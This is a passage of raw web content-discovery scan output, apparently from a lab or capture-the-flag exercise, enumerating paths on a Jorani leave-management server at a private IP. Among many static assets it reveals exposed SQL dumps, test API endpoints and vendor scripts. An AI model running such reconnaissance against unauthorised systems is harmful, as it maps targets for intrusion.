2l 309w 14073c http://192.168.143.109/assets/js/modernizr.min.js 200 GET 1158l 3638w 37853c http://192.168.143.109/assets/datatable/datatables.css 200 GET 105l 888w 51866c http://192.168.143.109/assets/js/jsencrypt.min.js 200 GET 4l 1338w 85582c http://192.168.143.109/assets/js/jquery-2.2.4.min.js 200 GET 23l 53w 998c http://192.168.143.109/docs/install/iis7/web.config 200 GET 10l 82w 3187c http://192.168.143.109/assets/ckeditor/adapters/jquery.js 200 GET 1420l 11667w 76251c http://192.168.143.109/assets/ckeditor/LICENSE.md 200 GET 5l 907w 16916c http://192.168.143.109/assets/ckeditor/lang/mk.js 200 GET 5l 901w 17292c http://192.168.143.109/assets/ckeditor/lang/id.js 200 GET 5l 1133w 19215c http://192.168.143.109/assets/ckeditor/lang/pt-br.js 200 GET 5l 1058w 19626c http://192.168.143.109/assets/ckeditor/lang/ro.js 200 GET 5l 155w 16602c http://192.168.143.109/assets/ckeditor/lang/zh-cn.js 200 GET 5l 547w 28243c http://192.168.143.109/assets/ckeditor/lang/th.js 200 GET 5l 899w 17043c http://192.168.143.109/assets/ckeditor/lang/bs.js 200 GET 5l 890w 22173c http://192.168.143.109/assets/ckeditor/lang/ar.js 200 GET 5l 166w 20884c http://192.168.143.109/assets/ckeditor/lang/ja.js 200 GET 5l 813w 17534c http://192.168.143.109/assets/ckeditor/lang/hr.js 200 GET 5l 1595w 20948c http://192.168.143.109/assets/ckeditor/lang/vi.js 200 GET 5l 908w 25523c http://192.168.143.109/assets/ckeditor/lang/ku.js 200 GET 5l 785w 17052c http://192.168.143.109/assets/ckeditor/lang/af.js 200 GET 5l 1068w 18896c http://192.168.143.109/assets/ckeditor/lang/fr-ca.js 200 GET 5l 709w 17727c http://192.168.143.109/assets/ckeditor/lang/et.js 200 GET 5l 920w 17313c http://192.168.143.109/assets/ckeditor/lang/ms.js 200 GET 5l 900w 18309c http://192.168.143.109/assets/ckeditor/lang/eo.js 200 GET 5l 867w 17843c http://192.168.143.109/assets/ckeditor/lang/sl.js 200 GET 5l 908w 16914c http://192.168.143.109/assets/ckeditor/lang/en-gb.js 200 GET 5l 825w 18393c http://192.168.143.109/assets/ckeditor/lang/eu.js 200 GET 5l 787w 19269c http://192.168.143.109/assets/ckeditor/lang/hu.js 200 GET 5l 919w 17481c http://192.168.143.109/assets/ckeditor/lang/sr-latn.js 200 GET 5l 789w 17574c http://192.168.143.109/assets/ckeditor/lang/sv.js 200 GET 5l 906w 16899c http://192.168.143.109/assets/ckeditor/lang/en-ca.js 200 GET 5l 1191w 19323c http://192.168.143.109/assets/ckeditor/lang/sq.js 200 GET 5l 1089w 18981c http://192.168.143.109/assets/ckeditor/lang/es.js 200 GET 5l 813w 17358c http://192.168.143.109/assets/ckeditor/lang/nb.js 200 GET 5l 1049w 23528c http://192.168.143.109/assets/ckeditor/lang/fa.js 200 GET 5l 887w 17535c http://192.168.143.109/assets/ckeditor/lang/is.js 200 GET 5l 793w 33198c http://192.168.143.109/assets/ckeditor/lang/ka.js 200 GET 5l 992w 27731c http://192.168.143.109/assets/ckeditor/lang/el.js 200 GET 5l 899w 24523c http://192.168.143.109/assets/ckeditor/lang/si.js 200 GET 5l 911w 26028c http://192.168.143.109/assets/ckeditor/lang/ug.js 200 GET 5l 790w 18981c http://192.168.143.109/assets/ckeditor/lang/lv.js 200 GET 5l 918w 21362c http://192.168.143.109/assets/ckeditor/lang/sr.js 200 GET 5l 1134w 18967c http://192.168.143.109/assets/ckeditor/lang/gl.js 200 GET 5l 977w 24158c http://192.168.143.109/assets/ckeditor/lang/hi.js 200 GET 5l 810w 17326c http://192.168.143.109/assets/ckeditor/lang/no.js 200 GET 5l 760w 18556c http://192.168.143.109/assets/ckeditor/lang/de.js 200 GET 5l 973w 17572c http://192.168.143.109/assets/ckeditor/lang/cy.js 200 GET 5l 960w 22387c http://192.168.143.109/assets/ckeditor/lang/mn.js 200 GET 5l 1138w 18853c http://192.168.143.109/assets/ckeditor/lang/ca.js 200 GET 80l 470w 37230c http://192.168.143.109/assets/ckeditor/plugins/icons.png 200 GET 5l 873w 21668c http://192.168.143.109/assets/ckeditor/lang/he.js 200 GET 11l 426w 34147c http://192.168.143.109/assets/js/jquery.form-validator.min.js 200 GET 5l 873w 27264c http://192.168.143.109/assets/ckeditor/lang/ru.js 200 GET 111l 531w 3595c http://192.168.143.109/assets/ckeditor/styles.js 200 GET 298l 1673w 122054c http://192.168.143.109/assets/ckeditor/plugins/icons_hidpi.png 200 GET 92l 664w 4393c http://192.168.143.109/assets/fonts/LICENSE_OFL.txt 200 GET 10l 45w 342c http://192.168.143.109/assets/ckeditor/config.js 200 GET 8l 44w 3429c http://192.168.143.109/assets/images/date_error.png 200 GET 3l 10w 386c http://192.168.143.109/assets/images/afternoon.png 200 GET 97l 251w 4425c http://192.168.143.109/assets/images/logo_simple.svg 200 GET 12l 49w 2122c http://192.168.143.109/assets/images/logo.png 200 GET 3l 21w 555c http://192.168.143.109/assets/images/leave_2d_AM.png 200 GET 499l 2578w 155269c http://192.168.143.109/assets/fonts/NotoSerifKhmer-Regular.ttf 200 GET 211l 1422w 66639c http://192.168.143.109/assets/fonts/NotoSansKhmer-Regular.ttf 200 GET 23l 55w 871c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-sr-SR.js 200 GET 23l 56w 916c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-eo.js 200 GET 23l 52w 936c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-eu.js 200 GET 23l 55w 1006c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-zh-CN.js 200 GET 23l 77w 919c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-af.js 200 GET 23l 57w 913c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-sv.js 200 GET 23l 58w 1222c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-el.js 200 GET 23l 56w 940c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-pl.js 200 GET 23l 55w 892c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-hr.js 200 GET 23l 63w 910c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-sq.js 200 GET 23l 94w 971c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-hu.js 200 GET 23l 80w 1459c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-ml.js 200 GET 23l 55w 1000c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-zh-TW.js 200 GET 23l 58w 1039c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-he.js 200 GET 24l 58w 1148c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-bg.js 200 GET 23l 61w 944c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-az.js 200 GET 23l 56w 925c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-ja.js 200 GET 23l 57w 913c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-da.js 200 GET 23l 56w 911c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-no.js 200 GET 59l 107w 1223c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-fa.js 200 GET 23l 97w 1230c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-ar-DZ.js 200 GET 23l 56w 904c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-de.js 200 GET 23l 59w 914c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-ms.js 200 GET 26l 88w 1015c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-ro.js 200 GET 23l 55w 897c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-ca.js 200 GET 24l 64w 1207c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-uk.js 200 GET 23l 72w 1353c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-km.js 200 GET 23l 81w 974c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-et.js 200 GET 23l 93w 980c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-fr-CH.js 200 GET 2l 73w 2510c http://192.168.143.109/assets/js/html5shiv.min.js 200 GET 22l 57w 918c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-nb.js 200 GET 24l 76w 967c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-sl.js 200 GET 23l 58w 1519c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-ta.js 200 GET 23l 57w 905c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-id.js 200 GET 22l 57w 915c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-nn.js 200 GET 1l 20w 2559c http://192.168.143.109/assets/js/context.menu.min.js 301 GET 9l 28w 346c http://192.168.143.109/assets/datatable/RowReorder-1.1.1 =\u0026gt; http://192.168.143.109/assets/datatable/RowReorder-1.1.1/ 301 GET 9l 28w 344c http://192.168.143.109/assets/datatable/Scroller-1.4.1 =\u0026gt; http://192.168.143.109/assets/datatable/Scroller-1.4.1/ 200 GET 3l 40w 1714c http://192.168.143.109/assets/js/js.state-2.2.0.min.js 200 GET 34l 67w 749c http://192.168.143.109/assets/font-awesome/scss/_animated.scss 200 GET 6l 15w 126c http://192.168.143.109/assets/font-awesome/scss/_fixed-width.scss 200 GET 12l 47w 471c http://192.168.143.109/assets/font-awesome/scss/_core.scss 200 GET 25l 71w 617c http://192.168.143.109/assets/font-awesome/scss/_bordered-pulled.scss 200 GET 15l 37w 798c http://192.168.143.109/assets/font-awesome/scss/_path.scss 200 GET 20l 47w 502c http://192.168.143.109/assets/font-awesome/scss/_stacked.scss 200 GET 13l 50w 388c http://192.168.143.109/assets/font-awesome/scss/_larger.scss 301 GET 9l 28w 348c http://192.168.143.109/assets/datatable/DataTables-1.10.11 =\u0026gt; http://192.168.143.109/assets/datatable/DataTables-1.10.11/ 200 GET 17l 47w 422c http://192.168.143.109/assets/font-awesome/scss/font-awesome.scss 301 GET 9l 28w 348c http://192.168.143.109/assets/datatable/FixedColumns-3.2.1 =\u0026gt; http://192.168.143.109/assets/datatable/FixedColumns-3.2.1/ 200 GET 20l 59w 692c http://192.168.143.109/assets/font-awesome/scss/_rotated-flipped.scss 200 GET 36l 272w 15270c http://192.168.143.109/assets/js/require-2.1.11.js 200 GET 6l 15w 125c http://192.168.143.109/assets/font-awesome/less/fixed-width.less 200 GET 25l 71w 610c http://192.168.143.109/assets/font-awesome/less/bordered-pulled.less 200 GET 688l 1380w 19891c http://192.168.143.109/assets/font-awesome/less/variables.less 200 GET 26l 74w 952c http://192.168.143.109/assets/font-awesome/less/mixins.less 200 GET 17l 47w 482c http://192.168.143.109/assets/font-awesome/less/font-awesome.less 200 GET 15l 37w 785c http://192.168.143.109/assets/font-awesome/less/path.less 200 GET 12l 47w 464c http://192.168.143.109/assets/font-awesome/less/core.less 200 GET 20l 54w 642c http://192.168.143.109/assets/font-awesome/less/rotated-flipped.less 200 GET 34l 67w 747c http://192.168.143.109/assets/font-awesome/less/animated.less 200 GET 19l 44w 396c http://192.168.143.109/assets/font-awesome/less/list.less 200 GET 9l 849w 126824c http://192.168.143.109/assets/js/jquery-ui.custom.min.js 200 GET 1645l 4150w 71714c http://192.168.143.109/assets/js/i18n/jquery-ui-i18n.js 200 GET 21l 56w 926c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-rm.js 200 GET 23l 129w 1117c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-vi.js 200 GET 21l 59w 1435c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-ka.js 200 GET 23l 128w 1320c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-ar.js 200 GET 23l 56w 935c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-it.js 200 GET 23l 55w 1197c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-hy.js 200 GET 23l 56w 968c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-fi.js 200 GET 23l 57w 906c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-tr.js 200 GET 23l 55w 1080c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-mk.js 200 GET 23l 79w 922c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-en-NZ.js 200 GET 23l 56w 965c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-lv.js 200 GET 23l 56w 984c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-lt.js 200 GET 22l 49w 890c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-pt.js 200 GET 23l 85w 1336c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-hi.js 200 GET 20l 47w 496c http://192.168.143.109/assets/font-awesome/less/stacked.less 200 GET 13l 50w 383c http://192.168.143.109/assets/font-awesome/less/larger.less 200 GET 23l 56w 1169c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-be.js 200 GET 23l 55w 913c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-gl.js 200 GET 23l 60w 969c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-is.js 200 GET 23l 90w 936c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-fr-CA.js 200 GET 23l 94w 941c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-nl-BE.js 200 GET 23l 55w 1004c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-zh-HK.js 200 GET 23l 55w 867c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-bs.js 200 GET 23l 78w 957c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-lb.js 200 GET 23l 55w 1060c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-sr.js 200 GET 23l 57w 1097c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-tj.js 200 GET 1921l 8093w 326329c http://192.168.143.109/assets/fonts/NotoNaskhArabic-Regular.ttf 200 GET 23l 57w 934c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-ko.js 200 GET 42l 1030w 31646c http://192.168.143.109/assets/datatable/datatables.min.css 200 GET 2026l 3430w 34344c http://192.168.143.109/assets/font-awesome/css/font-awesome.css 200 GET 688l 1389w 19972c http://192.168.143.109/assets/font-awesome/scss/_variables.scss 200 GET 677l 3038w 43840c http://192.168.143.109/assets/font-awesome/scss/_icons.scss 200 GET 14l 1142w 76998c http://192.168.143.109/assets/js/jszip.min.js 200 GET 4l 63w 26715c http://192.168.143.109/assets/font-awesome/css/font-awesome.min.css 200 GET 9l 246w 16849c http://192.168.143.109/assets/bootstrap/css/bootstrap-responsive.min.css 200 GET 6167l 13698w 133510c http://192.168.143.109/assets/bootstrap/css/bootstrap.css 200 GET 1109l 2160w 23211c http://192.168.143.109/assets/bootstrap/css/bootstrap-responsive.css 200 GET 291l 1848w 122914c http://192.168.143.109/assets/font-awesome/fonts/fontawesome-webfont.eot 200 GET 199l 1631w 76383c http://192.168.143.109/assets/templates/import-entitlements.xls 200 GET 5l 2891w 151147c http://192.168.143.109/assets/js/d3.min.js 200 GET 2280l 6370w 64163c http://192.168.143.109/assets/bootstrap/js/bootstrap.js 200 GET 7l 574w 30035c http://192.168.143.109/assets/css/flick/jquery-ui.custom.min.css 200 GET 74l 5380w 191346c http://192.168.143.109/assets/js/moment-with-locales.min.js 200 GET 677l 3038w 43166c http://192.168.143.109/assets/font-awesome/less/icons.less 200 GET 305l 1804w 146623c http://192.168.143.109/assets/font-awesome/fonts/fontawesome-webfont.woff 200 GET 9l 2493w 106015c http://192.168.143.109/assets/bootstrap/css/bootstrap.min.css 200 GET 277l 1470w 116553c http://192.168.143.109/assets/font-awesome/fonts/fontawesome-webfont.woff2 200 GET 2106l 3938w 202508c http://192.168.143.109/assets/font-awesome/fonts/FontAwesome.otf 200 GET 1211l 4999w 177472c http://192.168.143.109/assets/font-awesome/fonts/fontawesome-webfont.ttf 200 GET 960l 10550w 123614c http://192.168.143.109/assets/ckeditor/CHANGES.md 404 GET 9l 31w 277c http://192.168.143.109/js-lib 200 GET 39l 189w 1383c http://192.168.143.109/assets/ckeditor/README.md 404 GET 9l 31w 277c http://192.168.143.109/js-lib.php 404 GET 9l 31w 277c http://192.168.143.109/js.html.txt 404 GET 9l 31w 277c http://192.168.143.109/js-lib.html.txt 200 GET 594l 2650w 28719c http://192.168.143.109/assets/css/jorani-0.6.6.css 200 GET 5l 1020w 24415c http://192.168.143.109/assets/ckeditor/lang/bg.js 200 GET 5l 817w 18468c http://192.168.143.109/assets/ckeditor/lang/tr.js 200 GET 5l 906w 16899c http://192.168.143.109/assets/ckeditor/lang/en-au.js 200 GET 5l 839w 18111c http://192.168.143.109/assets/ckeditor/lang/fo.js 200 GET 5l 886w 18908c http://192.168.143.109/assets/ckeditor/lang/pl.js 200 GET 5l 726w 18440c http://192.168.143.109/assets/ckeditor/lang/ko.js 200 GET 5l 909w 22631c http://192.168.143.109/assets/ckeditor/lang/tt.js 200 GET 5l 961w 29750c http://192.168.143.109/assets/ckeditor/lang/gu.js 200 GET 185l 1605w 75819c http://192.168.143.109/assets/templates/import-users.xls 200 GET 5l 257w 32800c http://192.168.143.109/assets/ckeditor/lang/km.js 200 GET 5l 798w 18860c http://192.168.143.109/assets/ckeditor/lang/lt.js 200 GET 5l 648w 18177c http://192.168.143.109/assets/ckeditor/lang/fi.js 200 GET 5l 877w 19025c http://192.168.143.109/assets/ckeditor/lang/sk.js 200 GET 5l 1105w 18869c http://192.168.143.109/assets/ckeditor/lang/pt.js 200 GET 5l 907w 16913c http://192.168.143.109/assets/ckeditor/lang/en.js 200 GET 5l 183w 16540c http://192.168.143.109/assets/ckeditor/lang/zh.js 200 GET 5l 862w 26592c http://192.168.143.109/assets/ckeditor/lang/uk.js 200 GET 5l 989w 18696c http://192.168.143.109/assets/ckeditor/lang/it.js 200 GET 5l 974w 23331c http://192.168.143.109/assets/ckeditor/lang/bn.js 200 GET 5l 844w 18143c http://192.168.143.109/assets/ckeditor/lang/nl.js 200 GET 103366l 319009w 3072627c http://192.168.143.109/assets/datatable/datatables.js 200 GET 1067l 7446w 556584c http://192.168.143.109/assets/ckeditor/ckeditor.js 200 GET 132l 253w 1967c http://192.168.143.109/assets/ckeditor/contents.css 200 GET 640l 51812w 356620c http://192.168.143.109/assets/font-awesome/fonts/fontawesome-webfont.svg 301 GET 9l 28w 316c http://192.168.143.109/sql =\u0026gt; http://192.168.143.109/sql/ 200 GET 5l 1154w 19382c http://192.168.143.109/assets/ckeditor/lang/fr.js 200 GET 33l 257w 2381c http://192.168.143.109/sql/patch_to_0.3.0.sql 200 GET 57l 184w 1771c http://192.168.143.109/sql/GetFamilyTree_mysql5.6.sql 200 GET 86l 426w 3651c http://192.168.143.109/sql/patch_to_0.5.0.sql 200 GET 174l 672w 6075c http://192.168.143.109/sql/patch_to_0.2.0.sql 200 GET 165l 794w 5904c http://192.168.143.109/sql/patch_to_0.6.0.sql 200 GET 249l 1174w 12446c http://192.168.143.109/sql/patch_to_1.0.0.sql 200 GET 145l 515w 4204c http://192.168.143.109/sql/functions_only.sql 200 GET 28l 148w 1243c http://192.168.143.109/sql/patch_to_0.4.0.sql 200 GET 59l 256w 3498c http://192.168.143.109/sql/anonymize.sql 200 GET 525l 2799w 23079c http://192.168.143.109/sql/jorani.sql 200 GET 523l 9840w 1270493c http://192.168.143.109/assets/datatable/datatables.min.js 200 GET 5l 854w 18780c http://192.168.143.109/assets/ckeditor/lang/cs.js 200 GET 5l 821w 17813c http://192.168.143.109/assets/ckeditor/lang/da.js 200 GET 23l 68w 946c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-cs.js 200 GET 23l 55w 1297c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-th.js 200 GET 23l 56w 928c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-sk.js 200 GET 23l 78w 920c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-en-AU.js 200 GET 23l 95w 945c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-nl.js 200 GET 24l 70w 1133c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-ky.js 200 GET 23l 84w 927c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-cy-GB.js 200 GET 25l 94w 1067c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-fr.js 200 GET 23l 57w 968c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-pt-BR.js 200 GET 23l 57w 1140c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-kk.js 200 GET 23l 57w 911c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-es.js 200 GET 23l 59w 941c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-fo.js 200 GET 23l 76w 897c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-en-GB.js 200 GET 23l 57w 1140c http://192.168.143.109/assets/js/i18n/jquery.ui.datepicker-ru.js 200 GET 19l 44w 397c http://192.168.143.109/assets/font-awesome/scss/_list.scss 200 GET 26l 76w 972c http://192.168.143.109/assets/font-awesome/scss/_mixins.scss 200 GET 294l 983w 12780c http://192.168.143.109/assets/js/lms/leave.edit-0.7.0.js 200 GET 6l 315w 28636c http://192.168.143.109/assets/bootstrap/js/bootstrap.min.js 301 GET 9l 28w 318c http://192.168.143.109/tests =\u0026gt; http://192.168.143.109/tests/ 200 GET 32l 282w 1780c http://192.168.143.109/tests/load/README.md 200 GET 1198l 2364w 68705c http://192.168.143.109/tests/load/lms.jmx 200 GET 2l 4w 23c http://192.168.143.109/tests/rest/api.php 200 GET 1397l 2815w 82925c http://192.168.143.109/tests/load/benchmark.jmx 200 GET 3l 6w 35c http://192.168.143.109/tests/rest/api3.php 200 GET 2l 3w 14c http://192.168.143.109/tests/rest/api2.php 404 GET 9l 31w 277c http://192.168.143.109/jscripts 404 GET 9l 31w 277c http://192.168.143.109/jscripts.php 404 GET 9l 31w 277c http://192.168.143.109/jscripts.html.txt 200 GET 5320l 21325w 1903129c http://192.168.143.109/tests/load/Dataset.xlsx 404 GET 9l 31w 277c http://192.168.143.109/jscript 404 GET 9l 31w 277c http://192.168.143.109/jscript.php 404 GET 9l 31w 277c http://192.168.143.109/jscript.html.txt 404 GET 9l 31w 277c http://192.168.143.109/jsp 404 GET 9l 31w 277c http://192.168.143.109/jsp.php 404 GET 9l 31w 277c http://192.168.143.109/jsp.html.txt 404 GET 9l 31w 277c http://192.168.143.109/json 404 GET 9l 31w 277c http://192.168.143.109/json.php 404 GET 9l 31w 277c http://192.168.143.109/json.html.txt 301 GET 9l 28w 319c http://192.168.143.109/vendor =\u0026gt; http://192.168.143.109/vendor/ 200 GET 14l 45w 362c http://192.168.143.109/vendor/bin/openapi 200 GET 4l 9w 127c http://192.168.143.109/vendor/bin/generate_vcards.bat 200 GET 4l 9w 119c http://192.168.143.109/vendor/bin/vobject.bat 200 GET 14l 45w 364c http://192.168.143.109/vendor/bin/generate_vcards 200 GET 4l 9w 125c http://192.168.143.109/vendor/bin/openapi.bat 200 GET 14l 45w 356c http://192.168.143.109/vendor/bin/vobject 200 GET 4l 9w 130c http://192.168.143.109/vendor/bin/yaml-lint.bat 200 GET 14l 45w 367c http://192.168.143.109/vendor/bin/yaml-lint 200 GET 21l 168w 1070c http://192.168.143.109/vendor/composer/LICENSE 200 GET 30l 558w 5184c http://192.168.143.109/vendor/phpmailer/phpmailer/SECURITY.md 200 GET 7l 11w 215c http://192.168.143.109/vendor/phpmailer/phpmailer/get_oauth_token.php 200 GET 1l 1w 5c http://192.168.143.109/vendor/phpmailer/phpmailer/VERSION 200 GET 46l 311w 2092c http://192.168.143.109/vendor/phpmailer/phpmailer/COMMITMENT 200 GET 58l 146w 1702c http://192.168.143.109/vendor/phpmailer/phpmailer/composer.json 200 GET 2563l 4778w 82041c http://192.168.143.109/vendor/composer/installed.json 200 GET 39l 276w 1902c http://192.168.143.109/vendor/league/oauth2-client/CONTRIBUTING.md 200 GET 20l 41w 571c http://192.168.143.109/vendor/league/oauth2-client/CREDITS.md 200 GET 76l 461w 3364c http://192.168.143.109/vendor/league/oauth2-client/CODE_OF_CONDUCT.md 200 GET 335l 1456w 11431c http://192.168.143.109/vendor/league/oauth2-client/CHANGELOG.md 200 GET 21l 172w 1106c http://192.168.143.109/vendor/league/oauth2-client/LICENSE 200 GET 96l 575w 4237c http://192.168.143.109/vendor/league/oauth2-client/README.PROVIDER-GUIDE.md 200 GET 59l 100w 1414c http://192.168.143.109/vendor/league/oauth2-client/composer.json 200 GET 18l 43w 387c http://192.168.143.109/vendor/guzzlehttp/guzzle/Dockerfile 200 GET 19l 169w 1116c http://192.168.143.109/vendor/guzzlehttp/guzzle/LICENSE 200 GET 59l 113w 1347c http://192.168.143.109/vendor/guzzlehttp/guzzle/composer.json 200 GET 27l 53w 635c http://192.168.143.109/vendor/psr/http-client/composer.json 200 GET 12l 54w 548c http://192.168.143.109/vendor/psr/http-client/README.md 200 GET 23l 58w 377c http://192.168.143.109/vendor/psr/http-client/CHANGELOG.md 200 GET 90l 359w 3642c http://192.168.143.109/vendor/guzzlehttp/guzzle/README.md 200 GET 21l 168w 1064c http://192.168.143.109/vendor/psr/http-factory/LICENSE 200 GET 19l 169w 1085c http://192.168.143.109/vendor/psr/http-client/LICENSE 200 GET 41l 96w 1159c http://192.168.143.109/vendor/doctrine/lexer/composer.json 200 GET 9l 34w 352c http://192.168.143.109/vendor/doctrine/lexer/README.md 200 GET 10l 40w 429c http://192.168.143.109/vendor/psr/http-factory/README.md 200 GET 35l 57w 700c http://192.168.143.109/vendor/psr/http-factory/composer.json 200 GET 19l 167w 1065c http://192.168.143.109/vendor/doctrine/lexer/LICENSE 200 GET 26l 51w 621c http://192.168.143.109/vendor/psr/http-message/composer.json 200 GET 19l 169w 1085c http://192.168.143.109/vendor/psr/http-message/LICENSE 200 GET 13l 49w 358c http://192.168.143.109/vendor/psr/http-message/README.md 200 GET 36l 142w 1075c http://192.168.143.109/vendor/psr/http-message/CHANGELOG.md 200 GET 270l 996w 7634c http://192.168.143.109/vendor/guzzlehttp/psr7/CHANGELOG.md 200 GET 49l 112w 1353c http://192.168.143.109/vendor/guzzlehttp/psr7/composer.json 200 GET 21l 191w 1137c http://192.168.143.109/vendor/psr/simple-cache/LICENSE.md 200 GET 17l 36w 408c http://192.168.143.109/vendor/jpgraph/jpgraph/composer.json 200 GET 19l 169w 1111c http://192.168.143.109/vendor/guzzlehttp/psr7/LICENSE 200 GET 132l 504w 3955c http://192.168.143.109/vendor/myclabs/php-enum/README.md 200 GET 25l 172w 1109c http://192.168.143.109/vendor/markbaker/complex/license.md 200 GET 5l 26w 207c http://192.168.143.109/vendor/jpgraph/jpgraph/README.md 200 GET 25l 48w 552c http://192.168.143.109/vendor/psr/simple-cache/composer.json 200 GET 8l 57w 563c http://192.168.143.109/vendor/psr/simple-cache/README.md 200 GET 84l 151w 3390c http://192.168.143.109/vendor/markbaker/complex/composer.json 200 GET 221l 1804w 16383c http://192.168.143.109/vendor/phpmailer/phpmailer/README.md 200 GET 11l 35w 279c http://192.168.143.109/vendor/myclabs/php-enum/SECURITY.md 200 GET 156l 607w 4542c http://192.168.143.109/vendor/markbaker/complex/README.md 200 GET 33l 59w 781c http://192.168.143.109/vendor/myclabs/php-enum/composer.json 200 GET 20l 29w 582c http://192.168.143.109/vendor/myclabs/php-enum/psalm.xml 200 GET 502l 4372w 26529c http://192.168.143.109/vendor/phpmailer/phpmailer/LICENSE 200 GET 18l 171w 1076c http://192.168.143.109/vendor/myclabs/php-enum/LICENSE 200 GET 270l 1589w 14783c http://192.168.143.109/vendor/league/oauth2-client/README.md 200 GET 26l 48w 465c http://192.168.143.109/vendor/ralouphie/getallheaders/composer.json 200 GET 27l 51w 1088c http://192.168.143.109/vendor/ralouphie/getallheaders/README.md 200 GET 19l 167w 1065c http://192.168.143.109/vendor/symfony/polyfill-ctype/LICENSE 200 GET 12l 40w 352c http://192.168.143.109/vendor/symfony/polyfill-ctype/README.md 200 GET 44l 82w 1067c http://192.168.143.109/vendor/league/oauth2-google/composer.json 200 GET 21l 171w 1080c http://192.168.143.109/vendor/ralouphie/getallheaders/LICENSE 200 GET 22l 172w 1098c http://192.168.143.109/vendor/paragonie/random_compat/LICENSE 200 GET 19l 36w 596c http://192.168.143.109/vendor/paragonie/random_compat/psalm.xml 200 GET 165l 616w 3990c http://192.168.143.109/vendor/markbaker/matrix/README.md 200 GET 25l 82w 556c http://192.168.143.109/vendor/maennchen/zipstream-php/CONTRIBUTING.md 200 GET 28l 100w 1106c http://192.168.143.109/vendor/symfony/polyfill-php70/README.md 200 GET 86l 276w 2730c http://192.168.143.109/vendor/phpseclib/phpseclib/README.md 200 GET 27l 88w 791c http://192.168.143.109/vendor/phpseclib/phpseclib/appveyor.yml 200 GET 55l 184w 1506c http://192.168.143.109/vendor/sabre/uri/README.md 200 GET 21l 38w 404c http://192.168.143.109/vendor/robrichards/xmlseclibs/composer.json 200 GET 36l 87w 1121c http://192.168.143.109/vendor/bshaffer/oauth2-server-php/composer.json 200 GET 21l 170w 1074c http://192.168.143.109/vendor/bshaffer/oauth2-server-php/LICENSE 200 GET 1203l 5720w 50768c http://192.168.143.109/vendor/guzzlehttp/guzzle/UPGRADING.md 200 GET 38l 80w 988c http://192.168.143.109/vendor/symfony/polyfill-ctype/composer.json 200 GET 1338l 10777w 78813c http://192.168.143.109/vendor/guzzlehttp/guzzle/CHANGELOG.md 200 GET 809l 3320w 26641c http://192.168.143.109/vendor/guzzlehttp/psr7/README.md 200 GET 190l 667w 6597c http://192.168.143.109/vendor/league/oauth2-google/README.md 200 GET 42l 257w 1750c http://192.168.143.109/vendor/league/oauth2-google/CONTRIBUTING.md 200 GET 